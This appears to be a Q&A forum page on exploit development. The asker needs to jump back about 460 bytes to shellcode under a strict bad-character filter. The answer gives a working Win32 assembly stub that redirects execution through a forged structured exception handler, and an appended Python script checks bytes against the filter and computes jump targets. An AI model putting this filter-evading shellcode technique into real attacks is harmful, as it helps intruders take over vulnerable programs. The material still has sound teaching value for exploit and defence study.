0
votes

Update: Since I'm able to get the correct address into a register that I want to jump/call to, I think the best option would be to figure out a way to have self-modifying code result in a jmp/call register, e.g. FFD6 = call esi. Would anyone be able to give me some pointers or an example in assembly of how to get a resulting FFD6?

I'm messing around with an exploit, and having a hard time moving backwards in the stack due to bad characters. I need to move back ~460 bytes to get to the start of my buffer.

Here is a list of the bad characters:

\x0a\x0d\x1a\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e\x8f\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff

I'm limited to x86/alpha_mixed with a couple of exceptions like \x81 & \x8d. The only way I've been able to move back in the stack is \x74\x81 (which are allowed characters), but I'd have to do that 4 times to get back the ~460. That wouldn't be the biggest deal, except that it will also make it very difficult for me to segment my shellcode when I'm already having to encode it to alpha_mixed.

I'm not an assembly master, so is there any other way that I'm missing that I might be able to move directly back without jmp or call (FF)?

1
Self modifying code allowed? - Jester
Yes, as long as it doesn't have any bad characters. I was working on a list of bad characters when I think I found my solution: omelette egghunter. That should allow me to jump and combine the pieces of my shellcode - PaulthePirate
By the way, why is \x81 allowed? What are the list of bad characters then? :) - Jester
@Jester Yeah, I know. I've just been trying to use alpha_mixed to be safe. There are some random, normally bad characters that do seem to be working. \x81 & \x8d work. \x00 still allows for characters afterwards as well. I've edited my original post with a list of bad characters. - PaulthePirate
@Jester I tried to encode E92FFEFFFF jmp dword 0xfffffe34 with msfvenom into x86/alpha_mixed but it gave me a 695 byte shellcode that is obviously way too long. Other than doing it manually, is there a more efficient way? I'm able to get a correct memory address of where I want to jump into a register using good characters, but having problems finding opcodes that aren't bad characters to use the register with. - PaulthePirate

1 Answer

2
votes

I have a working solution, but it's for Windows only and is based on a few other assumptions.

It's not totally optimized; I guess there are better ways to do parts of this...

; ASSUMPTIONS:
;   Platform is Win32
;   ESI contains address to be jumped to
;   All characters except for 00 and the ones you listed above are allowed
;   The contents of the registers after the jump don't matter
; BASIC METHOD:
;   1) Set up a structured exception handler pointing to your target address
;   2) Cause an exception

; Get zero into EAX and EDX
00401000      B8 11111111   MOV EAX, 11111111
00401005      35 11111111   XOR EAX, 11111111
0040100A      50            PUSH EAX
0040100B      5A            POP EDX

; First part of the SEH: Push target address
0040100C      56            PUSH ESI

; Second part of the SEH: Read FS:[0] and push it
0040100D      64:0310       ADD EDX, FS:[EAX]
00401010      52            PUSH EDX

; Get zero into EDX again
00401011      50            PUSH EAX
00401012      5A            POP EDX

; Write new SEH pointer into FS:[0]
00401013      64:2110       AND FS:[EAX], EDX
00401016      64:0120       ADD FS:[EAX], ESP

; Trigger exception (writing to memory at address zero)
00401019      0110          ADD [EAX], EDX
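As an added check, not code from the question or the answer, the following Python script scans a byte sequence against the bad-character list from the question and resolves relative-jump displacements the way the CPU does (relative to the end of the instruction). It assumes \x00 is filtered too, as the answer does, and uses the answer's 27 opcode bytes, the question's \x74\x81, and the question's E9 2F FE FF FF as constructed samples; the function names are my own.

```python
"""Bad-byte scanner and relative-jump resolver (added example, not from the
question or the answer). Checks that the answer's SEH stub contains none of
the filtered bytes and shows why the E9 rel32 jump from the comments cannot
be used as-is."""
import struct

# Bad-character list copied from the question. 0x00 is added as an assumption,
# matching the answer's stated assumption that 00 is not allowed.
BAD_CHARS = frozenset(
    b"\x00\x0a\x0d\x1a\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e\x8f"
    b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f"
    + bytes(range(0xC0, 0x100))          # \xc0 .. \xff, all filtered
)

# Constructed samples taken from the page.
SEH_STUB = bytes.fromhex(
    "B811111111 3511111111 50 5A 56 640310 52 50 5A 642110 640120 0110"
)
JE_BACK = b"\x74\x81"                    # JE rel8 from the question
JMP_REL32 = b"\xE9\x2F\xFE\xFF\xFF"      # JMP rel32 from the comments


def find_bad_bytes(code: bytes, bad=BAD_CHARS):
    """Return [(offset, byte)] for every byte of `code` that the filter drops."""
    return [(i, b) for i, b in enumerate(code) if b in bad]


def rel_jump_target(instr_offset: int, encoding: bytes) -> int:
    """Resolve where a relative jump lands, given the offset of the instruction
    inside the buffer. Handles EB / 7x (rel8, 2 bytes) and E9 (rel32, 5 bytes).
    The displacement is signed and relative to the end of the instruction."""
    opcode = encoding[0]
    if opcode == 0xEB or 0x70 <= opcode <= 0x7F:
        disp = struct.unpack("<b", encoding[1:2])[0]   # signed 8-bit
        length = 2
    elif opcode == 0xE9:
        disp = struct.unpack("<i", encoding[1:5])[0]   # signed 32-bit
        length = 5
    else:
        raise ValueError("not a relative jump: %02x" % opcode)
    return instr_offset + length + disp


def chained_rel8_distance(count: int, encoding: bytes = JE_BACK) -> int:
    """Net backward distance covered by `count` copies of a rel8 jump, each
    placed so that the previous one lands exactly on it."""
    return count * (rel_jump_target(0, encoding))


if __name__ == "__main__":
    print("SEH stub bad bytes:", find_bad_bytes(SEH_STUB))          # []
    print("JE 81 lands at:", rel_jump_target(0, JE_BACK))            # -125
    print("4 chained JE 81:", chained_rel8_distance(4))              # -500
    print("E9 2FFEFFFF lands at:", rel_jump_target(0, JMP_REL32))    # -460
    print("E9 2FFEFFFF bad bytes:", find_bad_bytes(JMP_REL32))
```

The scan confirms the answer's claim that its 27-byte stub avoids every listed character, and the resolver shows why the rel32 jump is unusable here: the opcode E9 and the sign-extended displacement bytes FE FF FF all fall in the \xc0-\xff range that the filter removes, which is exactly the problem the question describes.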